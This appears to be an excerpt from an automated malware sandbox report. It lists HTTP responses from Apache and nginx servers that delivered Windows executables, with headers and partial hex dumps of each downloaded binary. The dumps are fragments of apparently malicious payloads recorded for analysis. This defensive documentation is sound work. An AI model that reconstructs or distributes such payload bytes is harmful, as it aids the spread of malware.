00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 ba 08 00 00 8c 38 00 00 00 00 00 4c c9 08 00 00 10 00 00 00 d0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 41 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 09 00 78 22 00 00 00 20 0a 00 00 82 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 40 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 09 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 94 b9 08 00 00 10 00 00 00 ba 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 20 2d 00 00 00 d0 08 00 00 2e 00 00 00 
be 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 01 0f 00 00 00 00 09 00 00 00 00 00 00 ec 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 78 22 00 00 00 10 09 00 00 24 00 00 00 ec 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 40 09 00 00 00 00 00 00 10 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 50 09 00 00 02 00 00 00 10 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 40 b5 00 00 00 60 09 00 00 b6 00 00 00 12 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 82 37 00 00 20 0a 00 00 82 37 00 00 c8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 41 00 00 00 00 00 00 4a 41 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:20 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:25 GMTContent-Type: application/octet-streamContent-Length: 419328Last-Modified: Thu, 26 Sep 2024 16:40:28 GMTConnection: keep-aliveETag: "66f58e7c-66600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b d9 e1 fd 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 4a 06 00 00 1a 00 00 00 00 00 00 ae 68 06 00 00 20 00 00 00 80 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 06 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 68 06 00 4b 00 00 00 00 80 06 00 f4 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 48 06 00 00 20 00 00 00 4a 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f4 16 00 00 00 80 06 00 00 18 00 00 00 4c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 06 00 00 02 00 00 00 64 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 68 06 00 00 00 00 00 48 00 00 00 02 00 05 00 0c 5b 03 00 a0 aa 02 00 03 00 00 00 dd 04 00 06 ac 05 06 00 c0 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 00 00 2e 28 05 05 00 06 28 01 00 00 06 2a 1b 30 09 00 ce 05 00 00 01 00 00 11 00 73 0d 00 00 0a 0a 00 00 02 7e 05 00 00 04 25 3a 17 00 00 00 26 7e 04 00 00 04 fe 06 26 00 00 06 73 0e 00 00 0a 25 80 05 00 00 04 28 01 00 00 2b 6f 10 00 00 0a 0b 38 5b 05 00 00 07 6f 11 00 00 0a 0c 00 08 17 17 1a 8d 0b 00 00 01 25 16 1f 46 7e 32 03 00 04 28 bf 05 00 06 a2 25 17 1f 47 7e 32 03 00 04 28 bf 05 00 06 a2 25 18 1f 48 7e 32 03 00 04 28 bf 05 00 06 a2 25 19 1f 65 7e 32 03 00 04 28 bf 05 00 06 a2 7e 33 03 00 04 28 c3 05 00 06 0d 00 09 6f 12 00 00 0a 13 04 38 d4 04 00 00 12 04 28 13 00 00 0a 13 05 73 1a 00 00 06 13 06 00 73 e1 03 00 06 13 07 11 06 7e 14 00 00 0a 7d 02 00 00 04 7e 14 00 00 0a 13 08 00 11 06 11 05 73 15 00 00 0a 28 16 00 00 0a 6f 17 00 00 0a 7d 02 00 00 04 11 06 7b 02 00 00 04 1f 49 7e 32 03 00 04 28 bf 05 00 06 6f 18 00 00 0a 13 09 11 09 39 15 00 00 00 00 1f 49 7e 32 03 00 04 28 bf 05 00 06 13 08 00 38 43 00 00 00 00 11 05 1f 1
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 
73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:28 GMTContent-Type: application/octet-streamContent-Length: 321536Last-Modified: Mon, 16 Sep 2024 13:46:13 GMTConnection: keep-aliveETag: "66e836a5-4e800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f2 26 e8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 dc 04 00 00 0a 00 00 00 00 00 00 0e fb 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 fa 04 00 57 00 00 00 00 00 05 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 0c 00 00 00 7c f9 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 db 04 00 00 20 00 00 00 dc 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 08 06 00 00 00 00 05 00 00 08 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 e6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 fa 04 00 00 00 00 00 48 00 00 00 02 00 05 00 98 e9 04 00 e4 0f 00 00 03 00 02 00 10 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 c9 11 68 37 03 ef c9 ea 63 37 33 eb 0c 77 88 e8 56 29 4a 2e 3a 18 a0 61 ed 57 27 e2 3d e6 7c a4 94 a0 51 26 fe a7 b0 05 a7 70 e5 eb e9 0e 49 49 6f 4f 9a 0c e2 67 c5 f5 c5 96 51 c2 fb 08 50 b7 7e 43 4d 16 02 1d 76 40 8e 50 2a e4 ea 53 6c 93 7f 83 1b 61 3d 08 cb 3a 75 3f 45 44 bd 22 a1 f8 4a 70 d6 d5 f1 8a 8f c5 32 a7 96 72 1c 42 c6 a3 ea 48 be cc 98 82 3f b7 76 87 a7 30 5d 32 ae c1 1f e9 8c e5 3e f4 c3 46 cc 7d c9 73 36 0b 98 4e 0e 2e cf 88 68 f7 23 19 a5 c6 02 ab 5a 93 36 97 d9 67 5e 67 75 da 61 57 26 d1 8a 32 95 6e 3f ad 76 97 d9 b0 2a e0 53 88 cb 14 7d 85 21 d4 5e 14 a1 45 cc 68 aa 64 70 c0 d3 c5 a5 14 bf 66 63 34 7b d7 b5 d3 2f 4f aa ac 49 bd f5 84 b9 76 e1 51 2c 55 d4 d4 e2 3e 78 4b b6 ac 63 f5 44 ca 85 1b e6 2f 0e d4 45 37 2e 00 ae 54 1c e3 ad a6 f4 74 84 1a b1 d1 a8 90 b8 79 c2 cc c6 b6 66 87 82 53 43 e2 d6 18 de 29 fa 46 b3 6d cc 22 32 18 c4 a7 ea 4d 73 fb 33 22 4b 4c af 65 89 8c 7a 63 db 42 62 c3 2d 05 6c c3 5c 17 9e fe 01 d
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:30 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 